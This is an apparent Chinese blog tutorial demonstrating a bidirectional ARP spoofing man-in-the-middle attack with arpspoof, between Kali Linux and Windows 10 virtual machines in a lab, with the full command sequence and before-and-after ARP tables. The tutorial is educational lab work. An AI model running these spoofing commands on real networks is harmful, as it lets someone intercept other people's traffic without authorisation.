【网络安全】基于 arpspoof 模拟ARP双向欺骗攻击

【网络安全】基于 arpspoof 模拟ARP双向欺骗攻击

原理

ARP欺骗

ARP欺骗(ARP Spoofing)是一种网络攻击技术,攻击者通过发送伪造的ARP(地址解析协议)消息,将其MAC地址与目标IP地址关联起来,从而拦截、修改或阻止网络通信。

攻击步骤

  1. 攻击者发送伪造的ARP响应:攻击者向网络中的设备发送伪造的ARP响应,声称其MAC地址对应某个目标IP地址。
  2. 设备更新ARP缓存:接收到伪造ARP响应的设备会更新其ARP缓存,将目标IP地址与攻击者的MAC地址关联起来。
  3. 流量劫持:由于设备的ARP缓存被篡改,发送到目标IP地址的数据包会被发送到攻击者的设备。攻击者可以选择转发这些数据包(中间人攻击)或直接截获数据包。

测试环境

  • 攻击者主机:Kali Linux 2024.3(VMware 虚拟机)
  • 靶机:Windows 10(VMware 虚拟机)

模拟步骤

  1. 查询靶机IP及网关地址

    ipconfig
    

    靶机IP及网关地址

    • 靶机IPv4地址:192.168.122.130
    • 默认网关地址:192.168.122.2
  2. 查询攻击者主机IP地址及MAC地址

    ifconfig
    

    eth0为网卡,inet后为IP地址。

    攻击者主机IP地址及MAC地址

    • IP地址:192.168.122.133
    • MAC地址:00:0c:29:d3:ca:99
  3. 在攻击前,确认靶机能够ping通百度

    ping baidu.com
    

    靶机ping通百度

  4. 在攻击前,查询靶机网关IP地址与MAC地址

    arp -a
    

    靶机网关IP地址与MAC地址

    • 网关地址:192.168.122.2
    • 物理地址:00-50-56-ef-90-2c
  5. 攻击者主机开启 Kali Linux IP转发

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
    
  6. 攻击者发起ARP双向欺骗

    sudo arpspoof -i eth0 -t 192.168.122.130 -r 192.168.122.2
    

    攻击者发起ARP双向欺骗

  7. 在攻击后,查询靶机网关IP地址与MAC地址

    arp -a
    

    攻击后靶机网关IP地址与MAC地址

    • 网关地址:192.168.122.2
    • 物理地址:00-0c-29-d3-ca-99(即攻击者主机所对应MAC地址)
  8. 仍能正常ping通百度。此时攻击者主机作为中转站,对靶机和网关同时进行欺骗,对靶机伪装为网关而对网关伪装成为靶机。

    ping baidu.com
    

    攻击后靶机仍能ping通百度

参考资料

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值